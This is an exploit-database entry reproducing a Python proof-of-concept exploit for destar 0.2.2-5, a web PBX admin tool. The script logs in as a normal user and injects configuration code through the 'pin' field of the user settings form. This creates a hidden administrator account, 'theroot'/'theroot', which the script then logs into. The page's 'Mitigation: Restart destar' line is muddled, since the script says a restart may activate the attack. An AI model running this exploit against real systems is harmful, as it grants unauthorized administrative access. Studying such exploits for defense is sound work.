header-logo
Suggest Exploit
vendor:
destar
by:
non root user
7.5
CVSS
HIGH
Authentication Bypass
287
CWE
Product Name: destar
Affected Version From: 0.2.2-5
Affected Version To: 0.2.2-5
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux Debian
2008

Exploit for destar 0.2.2-5

This exploit allows an attacker to bypass authentication and gain access to the system. The exploit is coded in Python and requires the urllib, sys and re libraries. The attacker must provide a valid username and password for a normal user of destar, and then the exploit will attempt to log in as the root user. If successful, the attacker will have access to the system.

Mitigation:

Restart destar
Source

Exploit-DB raw data:

#
#!/usr/bin/python
#
# Exploit for destar 0.2.2-5, tested on Linux Debian
#
# Bug found and  exploit coded by a non root user
# http://nonroot.blogspot.com/
#
# Enero 2008
#
# This is a PoC, please use it just for learning how to exploit something
#
# use: $python ./exploit_code.py
#
# required: urllib, sys and re
#
import urllib
import sys,re
print "Target host: i.e: http://127.0.0.1:8080/"
host=raw_input("Target host ( include http and /): ")
user=raw_input("A normal user for destar:")
password=raw_input("A normal password for destar:")
null=""
print "trying ..."
loggin = urllib.urlencode({'name': user, 'pw': password})
attack = urllib.urlencode({'cfim': null, 'cfbs': null, 'cfto': null, 'dsec' : '45', 'vmim' : 'yes','vmbs' : 'yes', 'vmu' : 'yes', 'pin' : '1234,) ; CfgOptUser(name="theroot",secret="theroot",pc="200.75.43.187",phone="agent1",pbx="pbx1",level="4",language="en",) ; CfgPhoneSip(pbx="pbx1000",name="OpenBSD-Agent",secret="imsecure",ext= "2999",dtmfmode = "rfc2833",enablecallgroup = True,callgroup = "1",queues="queue1",panel= True' })
response= urllib.urlopen(host+"login/", loggin)
data=response.read()
lookup=re.compile("'User'").search
match=lookup(data)
if match:
	print user,"logged, now trying exploit"
else:
	print "Password invalid, try again."
	sys.exit(2)

response= urllib.urlopen(host+"user/settings/", attack)

if response:
	print "ok, attack was done, now i will try loggin like 'theroot'"
	user='theroot'
	password='theroot'
	loggin = urllib.urlencode({'name': user, 'pw': password})
	response= urllib.urlopen(host+"login/", loggin)
	data=response.read()
	lookup=re.compile("'Programmer'").search
	match=lookup(data)
	if  match:
        	print "Exploit ok. try: ",host+"/user/info"
	else:
		print "Exploit failed, sorry, maybe you need that the sysadmin restart destar, be patient!"
		sys.exit(2)
else:
	print "Exploit failed, sorry, go and find some new bug or check this code and fix it!"
	sys.exit(2)

# milw0rm.com [2008-03-24]